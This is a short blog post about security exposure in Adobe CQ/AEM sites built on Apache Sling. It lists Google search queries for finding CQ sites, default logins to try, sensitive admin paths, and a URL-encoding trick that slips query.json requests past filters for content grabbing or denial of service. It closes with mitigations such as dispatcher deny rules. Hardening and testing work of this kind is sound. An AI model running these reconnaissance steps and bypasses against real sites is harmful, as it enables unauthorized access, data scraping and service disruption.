April 13, 2020
Estimated Post Reading Time ~

CQ related google queries

This query returns many CQ sites:
http://www.google.com/search?q=inurl:/content/geometrixx
Many of the sites accept .json rendering (-1.json, 34324232.json ...etc). Some also accept .query.json?statement=//*
Easy for content grabbing and DOS attack.

Also, this:
http://www.google.com/search?q=inurl:/content/dam
Usually, /content/dam.xml is large. Easy for DOS attack.

And,
http://www.google.com/search?q=%22/etc/designs/*.css%22
Many sites block .json on /content. But they still let .json on /etc.

These queries show a few author instances (try default cq logins other than admin:admin such as author:author):
http://www.google.com/search?q=%22cq5%20login%22
http://www.google.com/search?q=inurl:%22/etc/replication%22

Once you locate a CQ site, you can try various paths:
/system/console
/admin
/etc/replication
/crx
/crxde
/bin/crxde/logs
/libs/cq/core/content/login.html
/libs/crxde/resources/welcome.html

Also, try json servlets:
http://www.adobe.com/etc/pagetables/feed_proxies.tidy.-2345.json?asdf

format is:
/some/resource.<depth>.json

If things are blocked, try with some of the characters replaced with url encoding.

For example, this is 404:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//element%28*,cq:Page%29

But this returns:
https://author.day.com/libs/cq/core/content/login.qu%65ry.js%6Fn?statement=//element(*,cq:Page)

e in query is replaced with %65 and o in JSON is replaced with %6F

Most of these are possible because of Sling: http://sling.apache.org/
Usually, databases use different ports (and different protocols other than HTTP) to communicate with HTTP applications. Even databases that use HTTP (such as CouchDB http://couchdb.apache.org/) can be configured to use a different port from the HTML rendering server. But Sling exposes entire database (JCR) content on the same port for HTTP clients to access.

Sling does have an access control mechanism. But, the common development paradigm for Sling is to expose all resources to everyone.

You could expose a few resources and have resourceType to query/access actual content resources.
For example, instead of exposing the following:
/content/a.html
/content/b.html
/content/c.html
....

You can expose only one resource:
/content/pages

And, have resourceType of /content/pages handle GET requests to:
/content/pages.a.html
/content/pages.b.html
/content/pages.c.html
...
by reading actual content from:
/hidden/a
/hidden/b
/hidden/c
...

Or, you can have a proxy server blocking various paths that could be used maliciously. For example, CQ has a dispatcher module for Apache httpd. You can configure dispatcher.any to deny access to various globs.


By aem4beginner
Posted by at
Labels:

No comments:

Post a Comment

If you have any doubts or questions, please let us know.